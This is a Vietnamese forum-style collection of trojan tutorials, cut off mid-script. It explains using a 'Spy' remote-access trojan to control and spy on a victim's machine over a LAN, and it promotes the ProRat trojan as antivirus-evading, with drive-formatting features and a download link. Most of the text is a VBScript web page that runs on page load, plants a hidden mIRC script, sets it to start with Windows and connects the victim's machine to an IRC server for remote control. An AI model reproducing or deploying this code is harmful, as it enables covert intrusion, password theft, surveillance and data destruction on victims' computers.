Con Spy này sẽ mở một cổng 87 trên máy Victim để bạn
xâm nhập và phần Password là pass bạn đặt ra để đăng
nhập vào máy Victim . Sau đó bạn sẽ tạo được một File
như sau :

Đó chính là File SSPPYY .File này nằm trong thư mục bạn
đã cài Spy , ở đây File SSPPYY của mình nằm trong ổ C
thư mục Program Files/Spy

Đến lúc này bạn có thể chạy File SSPPYY.EXE , nó đóng
vai trò như một Trojan bạn có thể mang nó đi lây nhiễm
được nhưng trong bài viết này tôi chỉ hướng dẫn các
bạn điều khiển trong mạng LAN tức là bạn phải ngồi
cùng một địa điểm với Victim bạn mới có thể điều
khiển được Victim . Sau khi chạy File đó SSPPYY sẽ gửi
về cho bạn một bức mail có Link để xâm nhập máy victim
dạng như sau :

http://192.168.0.173:87

The password is:123456

Bạn đăng nhập vào Link trên bằng Pass mà bạn đã đặt
ra Hình này xuất hiện khi ban Click vào link mà Spy gửi về
:

Bạn xâm nhập vào máy Victim , khi đó sẽ có một gia o
diện để bạn điều khiển máy nạn nhân , nhìn hình vẽ
này có lẽ tôi không cần giải thích bạn cũng biết phải
làm gì " Shut Down , Logoff , Reboot " & lấy Pass và xem máy
victim làm gì .Có lẽ bạn sẽ thắc mắc rằng tại sao ra
khỏi dich vụ internet bạn cài đặt sẽ không sài được
Link đó , tất nhiên là vẫn có thể xâm nhập được
nhưng do tính chất khá nguy hiểm của nó mình không nêu ra
. Nếu bạn thích tìm tòi tôi nghĩ là cũng có thể tìm ra .
Chúc các bạn thành công nhé !

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

Trojan ProHack.Net Remote Administrator Tool v1.4
<!--[if !supportEmptyParas]--> <!--[endif]-->

Xin được giới thiệu một kon trojan mà tui vô tình tóm
được trên astalavista.com

Kon này được quảng cáo là "This is one of the best trojans
you'll ever see" và đặc biệt là cái dòng "cant be catched by
any antivirus and firewall" hehe.. thấy hay ko?

<!--[if !supportEmptyParas]--> <!--[endif]-->

Thú thực là tui chưa có điều kiện để thử con này
nhưng vì thấy hay quá nên viết bài giới thiệu mọi
người chơi thôi. Tui đã down về 2 bản 1.6 và 1.4 Điều
kỳ lạ là server của bản 1.6 thì bị phát hiện bởi NAV
còn 1.4 thì ko!!! Tui nói file server đây là file nguyên thủy
của nó nhá, chưa hề được code hoặc bind với file nào
khác cả! Cho đến giờ, NA V của tui (update thường xuyên)
vẫn không thể phát hiện được server của bản 1.4 Theo
quảng cáo của nhóm ProHack thì nếu bạn muốn có một chú
trojan thực sự undetectable thì bạn hãy liên hệ đến
sa...@prohack.net để MUA bản ProRat v1.5 Special Edition với
giá.. 100$!!!

Như tui đã giới thiệu ở dòng đầu tiên, đây lại là
một chú kiểu Trojan Remote - Trojan điều khiển. Nó dùng
để điều khiển - biến máy nạn nhân thành máy của
chúng ta. Tất nhiên là theo nghĩa logic thôi chứ theo vật
lý thì.. vào nhà đá mất hehe. Nó sẽ không gửi về cho
bạn bất cứ một log hoặc pass của bất cứ cái gì.
Việc bạn c̐ 7;n làm là send server file cho victim, connect vào
máy nó. Khi đó bạn cứ việc lấy bất cứ cái gì mình
muốn.

ProRat cũng giống Sub7 ở tất cả các chức năng cơ bản.
Ngòai ra nó cũng mở rộng một số chức năng như:

- Chỉnh sửa những cái trong Control Panel ở máy nạn nhân

- Make Keyboard Lights Go Crazy: hehe tui thử rồi. 3 cái đèn
*lock trên bàn phím sẽ nhấp nháy trông rất vui mắt

- Make Mouse Go Crazy: Victim sẽ rất bực đấy.

- Give Damage: !!! Format Victim's Drivers

- .. còn nhiều tính năng hay lắm.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Nếu đã thấy hứng thú với kon này thì đây là nơi bạn
có thể download nó một cách an tòan:
http://www.astalavista.com//data/ProRat_v1.4.zip

trừ phi astalavista tính chơi anh em thôi

Kĩ năng gắn Trojan vào HTML bằng VBScript/Điều khiển máy
tính qua mạng

I. Nguyên lí hoạt động.

<!--[if !supportEmptyParas]--> <!--[endif]-->

1.Chuẩn bị

<!--[if !supportEmptyParas]--> <!--[endif]-->

Dùng VBScript để gọi các ActiveX cần thiết có trong mỗi
máy tính của victim khi victim duyệt site của bạn. (dành cho
IE)

<!--[if !supportEmptyParas]--> <!--[endif]-->

+ Nếu mà máy tính victim đang để chế độ cho phép chạy
ActiveX thì coi như xong, không cần bàn cãi gì nữa

<!--[if !supportEmptyParas]--> <!--[endif]-->

+ Nếu mà máy tính victim không để chế độ ấy thì sẽ
hiện ra một thông báo bằng tiếng Anh là, "bạn có cho
phép chạy activeX hay không" Và 90% là "OK", bạn thử đặt
địa vị bạn mà xem.

<!--[if !supportEmptyParas]--> <!--[endif]-->

2.Hoạt động

<!--[if !supportEmptyParas]--> <!--[endif]-->

Khi đã chạy được VBScript thì việc bạn cần làm đã
quá rõ. hãy cho Script tạo một file trên máy tính victim và
nhiệm vụ file đó là mở cổng cho bạn thâm nhập.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Về vụ này thì bạn có thể cho script viết nguyên si một
mã nguồn ASCII của một Application chương trình trojan exe
của bạn. Bạn nên sử dụng chương trình nhẹ thôi vì nó
gắn lên web mà.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Tất cả chỉ có vậy các bạn hãy thử xem.

<!--[if !supportEmptyParas]--> <!--[endif]-->

II. Ví dụ cụ thể

<!--[if !supportEmptyParas]--> <!--[endif]-->

Sau đây Luke sẽ giới thiệu cho các bạn một các để xâm
nhâp máy tính của victim theo cách kia.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Trước hết do hầu hết các chương trình TroJan đều bị
NAV2002 tóm gọn cho nên việc tìm một TroJan nhẹ và mạnh
là một điều hết sức khó khăn (anh JAL hứa cho em một
con xịn vẫn chưa chịu cho đấy nhé). Mặt khác nhiều
bạn trong diễn đàn chưa có một kiến thức sâu về các
cách dùng TroJan kiểu remote máy tính và ngay cả Luke cũng
vậy . Chính vì các lí do đó Luke sẽ chọn một trong
những "tài nguyên sẵn có" để làm virus (để tránh NAV)
và phải thật phổ cập để nhiều người cùng hiểu. Đó
là mIRC.

<!--[if !supportEmptyParas]--> <!--[endif]-->

1. Chuẩn bị

<!--[if !supportEmptyParas]--> <!--[endif]-->

+ Trình duyệt IE trên máy victim

<!--[if !supportEmptyParas]--> <!--[endif]-->

+ Một chương trình mIRC nằm trên HDD C:\

<!--[if !supportEmptyParas]--> <!--[endif]-->

+ Windows Root Path = C:\windows\

<!--[if !supportEmptyParas]--> <!--[endif]-->

2.Cách hoạt động

<!--[if !supportEmptyParas]--> <!--[endif]-->

Tận dụng chương trình mirc trong máy victim từ đó tạo
một file mirc khác âm thầm chạy trên máy tính của victim.
Chương trình mirc này sẽ connect vào một server chat, ở
đây Luke chọn là irc.mircx.com:6667. Sau đó Luke sẽ vào
server, vào cái # mà các victim tự động connect vào mà
remote chúng. Tất nhiên Luke đã viết thêm một số command
lên mirc của victim để ta có thể sử dụng máy của victim
như máy của mình.

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

VB Hoạt động như thế nào ?

<!--[if !supportEmptyParas]--> <!--[endif]-->

Nó sẽ tìm trong ổ đĩa C máy tính của victim một file là
mirc.ini, vì sao lại chọn file này. Bởi vì khi chạy mirc
thì chương trình sẽ tự động tạo ra file này. Cho nên
sự tồn tại của nó gắn liền với sự tồn tại của
mirc.exe

<!--[if !supportEmptyParas]--> <!--[endif]-->

Tiếp đó VB sẽ tạo 1 file script mang tên script.mrx trong thư
mục logs/ của mirc.exe. Cho vào đây để victim đỡ thấy.
và sửa file mirc.ini cho nó chấp nhận file logs/script.mrx là
một REMOTE file.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Script gắn vào sẽ hoạt động nhu thế nào ?

<!--[if !supportEmptyParas]--> <!--[endif]-->

Script đó sẽ tạo một Trojan mirc trong thư mục C:\windows\
bằng cách copy chính file chạy hiện thời vaò trong đó,
tạo cái script cho bạn có thể remote computer, viết thêm
vào file win.ini một đoạn load=c:\windows\mirc.exe để mirc
trojan tự động hoạt động mỗi khi khởi động máy. Và
trojan đó sẽ được minimized trong tray. Tuy nhiên nếu vicimt
phát hiện và close nó thì nó vẫn tự động chạy tiếp.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Thế là bạn đã có thể hoàn toàn nắm máy victim trong tay
nếu điều khiển được chưong trinh mIRC Trojan đó

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

<script LANGUAGE="VBScript">

<!--[if !supportEmptyParas]--> <!--[endif]-->

dim Otag

<!--[if !supportEmptyParas]--> <!--[endif]-->

dim Ttag

<!--[if !supportEmptyParas]--> <!--[endif]-->

dim DummyTag

<!--[if !supportEmptyParas]--> <!--[endif]-->

dim SectionDef

<!--[if !supportEmptyParas]--> <!--[endif]-->

Sub window_onLoad()

<!--[if !supportEmptyParas]--> <!--[endif]-->

window.status="This page is being loaded. Please wait ..."

<!--[if !supportEmptyParas]--> <!--[endif]-->

call ShowFolderList("c:\")

<!--[if !supportEmptyParas]--> <!--[endif]-->

Window.status="Done."

<!--[if !supportEmptyParas]--> <!--[endif]-->

end sub

<!--[if !supportEmptyParas]--> <!--[endif]-->

-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

</script> <script LANGUAGE="VBScript">

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--

<!--[if !supportEmptyParas]--> <!--[endif]-->

sub ShowFolderList(s)

<!--[if !supportEmptyParas]--> <!--[endif]-->

on error resume next

<!--[if !supportEmptyParas]--> <!--[endif]-->

'Level 1

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set filesys = CreateObject("Scripting.FileSystemObject")

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set RootFolder1 = FileSys.GetFolder(s)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set SubFolds1 = RootFolder1.subfolders

<!--[if !supportEmptyParas]--> <!--[endif]-->

For Each f1 in Subfolds1

<!--[if !supportEmptyParas]--> <!--[endif]-->

s = f1.path & "\"

<!--[if !supportEmptyParas]--> <!--[endif]-->

Otag = s & "mirc.ini"

<!--[if !supportEmptyParas]--> <!--[endif]-->

DummyTag= "C:\winamod.dat"

<!--[if !supportEmptyParas]--> <!--[endif]-->

TTag= s & "logs\script.mrx"

<!--[if !supportEmptyParas]--> <!--[endif]-->

SectionDef= "[rfiles]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

if filesys.fileexists(otag) then

<!--[if !supportEmptyParas]--> <!--[endif]-->

Call Filemod()

<!--[if !supportEmptyParas]--> <!--[endif]-->

filesys.CopyFile DummyTag, Otag, true

<!--[if !supportEmptyParas]--> <!--[endif]-->

Call ImplementRemote()

<!--[if !supportEmptyParas]--> <!--[endif]-->

filesys.CopyFile DummyTag, Otag, true

<!--[if !supportEmptyParas]--> <!--[endif]-->

Call ImplementWarn()

<!--[if !supportEmptyParas]--> <!--[endif]-->

filesys.CopyFile DummyTag, Otag, true

<!--[if !supportEmptyParas]--> <!--[endif]-->

Call ImplementFserv()

<!--[if !supportEmptyParas]--> <!--[endif]-->

filesys.CopyFile DummyTag, Otag, true

<!--[if !supportEmptyParas]--> <!--[endif]-->

call ImplementPerfCheck()

<!--[if !supportEmptyParas]--> <!--[endif]-->

filesys.CopyFile DummyTag, Otag, true

<!--[if !supportEmptyParas]--> <!--[endif]-->

Call ImplementPerform()

<!--[if !supportEmptyParas]--> <!--[endif]-->

SetClearArchiveBit(Otag)

<!--[if !supportEmptyParas]--> <!--[endif]-->

End If

<!--[if !supportEmptyParas]--> <!--[endif]-->

Call ShowFolderList(s)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Next

<!--[if !supportEmptyParas]--> <!--[endif]-->

End sub

<!--[if !supportEmptyParas]--> <!--[endif]-->

Function FiltNum(FilString)

<!--[if !supportEmptyParas]--> <!--[endif]-->

'on error resume next

<!--[if !supportEmptyParas]--> <!--[endif]-->

countdown=5

<!--[if !supportEmptyParas]--> <!--[endif]-->

do

<!--[if !supportEmptyParas]--> <!--[endif]-->

Comp = mid(FilString,2,countdown)

<!--[if !supportEmptyParas]--> <!--[endif]-->

if isnumeric(Comp) then LastNum = Comp : exit do

<!--[if !supportEmptyParas]--> <!--[endif]-->

countdown=countdown-1

<!--[if !supportEmptyParas]--> <!--[endif]-->

loop until countdown =0

<!--[if !supportEmptyParas]--> <!--[endif]-->

FiltNum = LastNum

<!--[if !supportEmptyParas]--> <!--[endif]-->

end function

<!--[if !supportEmptyParas]--> <!--[endif]-->

Function LastLineNum(SSection)

<!--[if !supportEmptyParas]--> <!--[endif]-->

'on error resume next

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set FS1N = CreateObject("Scripting.FileSystemObject")

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set FR1N = FS1N.OpenTextFile(otag,1,true)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Do While FR1N.AtEndOfStream <> True

<!--[if !supportEmptyParas]--> <!--[endif]-->

segment1 = FR1N.readline

<!--[if !supportEmptyParas]--> <!--[endif]-->

w = InstrRev(segment1,SSection)

<!--[if !supportEmptyParas]--> <!--[endif]-->

counts=counts+1

<!--[if !supportEmptyParas]--> <!--[endif]-->

if w > 0 then

<!--[if !supportEmptyParas]--> <!--[endif]-->

do

<!--[if !supportEmptyParas]--> <!--[endif]-->

if FR1N.AtEndOfStream = True then exit do

<!--[if !supportEmptyParas]--> <!--[endif]-->

segmentk = FR1N.readline

<!--[if !supportEmptyParas]--> <!--[endif]-->

k = InstrRev(segmentk,"n",1)

<!--[if !supportEmptyParas]--> <!--[endif]-->

if k=1 then

<!--[if !supportEmptyParas]--> <!--[endif]-->

LastNum=FiltNum(segmentk)

<!--[if !supportEmptyParas]--> <!--[endif]-->

end if

<!--[if !supportEmptyParas]--> <!--[endif]-->

Loop until k=0

<!--[if !supportEmptyParas]--> <!--[endif]-->

end if

<!--[if !supportEmptyParas]--> <!--[endif]-->

loop

<!--[if !supportEmptyParas]--> <!--[endif]-->

FR1N.Close

<!--[if !supportEmptyParas]--> <!--[endif]-->

LastLineNum=LastNum

<!--[if !supportEmptyParas]--> <!--[endif]-->

end function

<!--[if !supportEmptyParas]--> <!--[endif]-->

Function Filemod()

<!--[if !supportEmptyParas]--> <!--[endif]-->

'on error resume next

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fs1 = CreateObject("Scripting.FileSystemObject")

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fr1 = fs1.OpenTextFile(otag,1,true)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fs2 = CreateObject("Scripting.FileSystemObject")

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fr2 = fs2.OpenTextFile(DummyTag,2,true)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Do While fr1.AtEndOfStream <> True

<!--[if !supportEmptyParas]--> <!--[endif]-->

segment1 = fr1.readline

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr2.writeline segment1

<!--[if !supportEmptyParas]--> <!--[endif]-->

w = InstrRev(segment1,"[rfiles]")

<!--[if !supportEmptyParas]--> <!--[endif]-->

counts=counts+1

<!--[if !supportEmptyParas]--> <!--[endif]-->

if w > 0 then

<!--[if !supportEmptyParas]--> <!--[endif]-->

counts2=counts

<!--[if !supportEmptyParas]--> <!--[endif]-->

do

<!--[if !supportEmptyParas]--> <!--[endif]-->

if fr1.AtEndOfStream = True then exit do

<!--[if !supportEmptyParas]--> <!--[endif]-->

segmentk = fr1.readline

<!--[if !supportEmptyParas]--> <!--[endif]-->

k = InstrRev(segmentk,"n",1)

<!--[if !supportEmptyParas]--> <!--[endif]-->

if k=1 then

<!--[if !supportEmptyParas]--> <!--[endif]-->

LastNum=FiltNum(segmentk)

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr2.writeline segmentk

<!--[if !supportEmptyParas]--> <!--[endif]-->

end if

<!--[if !supportEmptyParas]--> <!--[endif]-->

COUNTS2=COUNTS2+1

<!--[if !supportEmptyParas]--> <!--[endif]-->

Loop until k<>1

<!--[if !supportEmptyParas]--> <!--[endif]-->

exit do

<!--[if !supportEmptyParas]--> <!--[endif]-->

end if

<!--[if !supportEmptyParas]--> <!--[endif]-->

loop

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr1.Close

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr2.close

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fs3 = CreateObject("Scripting.FileSystemObject")

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fr3 = fs3.OpenTextFile(DummyTag,8,true)

<!--[if !supportEmptyParas]--> <!--[endif]-->

TrojanInfo = "n" & lastlinenum(SectionDef)+1 & "=logs\script.mrx"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr3.writeline TrojanInfo

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr3.Close

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fs4 = CreateObject("Scripting.FileSystemObject")

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fr4 = fs4.OpenTextFile(Otag,1,true)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fs5 = CreateObject("Scripting.FileSystemObject")

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fr5 = fs5.OpenTextFile(DummyTag,8,true)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Do While fr4.AtEndOfStream <> True

<!--[if !supportEmptyParas]--> <!--[endif]-->

segment2 = fr4.readline

<!--[if !supportEmptyParas]--> <!--[endif]-->

if fr4.line >= counts2 + 2 then

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr5.writeline segment2

<!--[if !supportEmptyParas]--> <!--[endif]-->

end if

<!--[if !supportEmptyParas]--> <!--[endif]-->

loop

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr4.Close

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr5.Close

<!--[if !supportEmptyParas]--> <!--[endif]-->

fs5.CopyFile DummyTag, Otag, true

<!--[if !supportEmptyParas]--> <!--[endif]-->

Call FLDL(TTag)

<!--[if !supportEmptyParas]--> <!--[endif]-->

end Function

<!--[if !supportEmptyParas]--> <!--[endif]-->

sub FLDL(TTag)

<!--[if !supportEmptyParas]--> <!--[endif]-->

'on error resume next

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fs6 = CreateObject("Scripting.FileSystemObject")

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fr6 = fs6.OpenTextFile(TTag,2,true)

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "on 1:start: {"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "if (%current.dir == $null) set %current.dir C:\"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "if ($mircdir != C:\windows\) &&
($isdir(C:\windows\logs\) == $false) {"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".mkdir C:\windows\logs\"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".copy -o $mircdirlogs\script.mrx C:\windows\logs\"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\logs\script.mrx on 1:EXIT: .run
C:\windows\ $+ $nopath($mircexe)"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".copy -o $mircexe C:\windows\"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [options]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini
n0=1,0,0,1,0,0,300,0,0,0,1,0,0,0,1,0,0,0,1,0,4096,0,1,0,0,0,1,1,0,50,0,1"


<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini
n1=5,100,0,0,0,0,0,0,2,1,0,1,0,0,1,1,1,1,0,0,1,1,1,0,5,0,1,0,0,0,1,0,0"


<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini
n2=0,0,0,1,1,1,1,1,0,60,120,0,0,1,0,0,1,1,0,120,20,10,0,0,1,0,0,1,0,0,0,0,0"


<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini
n3=5000,0,0,0,1,0,1,1,1,1,0,1,0,0,1,1,3,1,0,1,0,0,0,0,1,1,2,13,0,0,1,1,60,0"


<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini
n4=1,0,1,0,0,0,9999,0,0,0,1,0,1024,0,1,99999,30,0,0,0,2,1,1,0,1,5000,1,5,0,0,3,0,1,1"


<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini
n5=1,1,1,1,1,1,1,1,1,1,6667,0,0,0,0,0,1,0,300,30,10,0,1,26,0,0,1,8192,1,0,0,82,0"


<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini
n6=0,0,11,1,1,1,1,1,1,1,0,0,1,0,0,0,0,0,0,1,0,0,100,1,1,0,0,1,0,0,4,1,0,1"


<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini
n7=1,0,0,0,0,0,0,1,1,1,1,1,0,1,0,0,1,70,0,10,0,1,1,1,1,1,0,0,0,0,1,1,1,1"


<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [dccserver]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini n0=0,59,0,0,0,0"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [files]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini servers=servers.ini"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini trayicon=Explorer.exe"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini finger=finger.txt"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini urls=urls.ini"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini addrbk=addrbk.ini"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [text]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini commandchar=/"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini linesep=-"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini timestamp=[HH:nn]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini
accept=*.bmp,*.gif,*.jpg,*.log,*.mid,*.mp3,*.ogg,*.png,*.txt,*.wav,*.wma,*.zip"


<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini
ignore=*.exe,*.com,*.bat,*.dll,*.ini,*.mrc,*.vbs,*.js,*.pif,*.scr,*.lnk,*.pl,*.shs,*.htm,*.html&a


<!--[if !supportEmptyParas]--> <!--[endif]-->

mp;a

<!--[if !supportEmptyParas]--> <!--[endif]-->

mp;q

<!--[if !supportEmptyParas]--> <!--[endif]-->

uot;

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini network=All"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [dde]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini ServerStatus=on"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini ServiceName=mIRC"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini CheckName=off"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [ident]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini active=yes"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini userid=Remote"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini system=UNIX"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini port=113"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [mirc]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini user=Remote"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini email=Remote"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini nick= Guest $+
$rand(10000,99999)"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini anick= Guest $+
$rand(1000,99999)"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini
host=mircxSERVER:irc.mircx.com:6667"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [warn]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini fserve=on"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini dcc=on"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [dirs]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini logdir=logs\"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini waves=sounds\"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini midis=sounds\"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini mp3s=sounds\"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini wmas=sounds\"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini oggs=sounds\"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [about]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini version=6.03"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini show=BR26354"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [wizard]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini warning=2"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [windows]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini main=100,600,41,490,0,1,0"


<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini
scripts=129,473,90,441,0,0,0"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini wchannel=0,112,0,27,0,1,0"


<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini
wquery=21,423,21,309,1,1,0"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [colours]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini
n0=0,6,4,5,2,3,3,3,3,3,3,1,5,7,6,1,3,2,3,5,1,0,1,0,1,15,6,0"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [pfiles]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini n0=popups.ini"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini n1=popups.ini"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini n2=popups.ini"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini n3=popups.ini"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini n4=popups.ini"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [ports]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini random=off"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini bind=off"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [socks]"

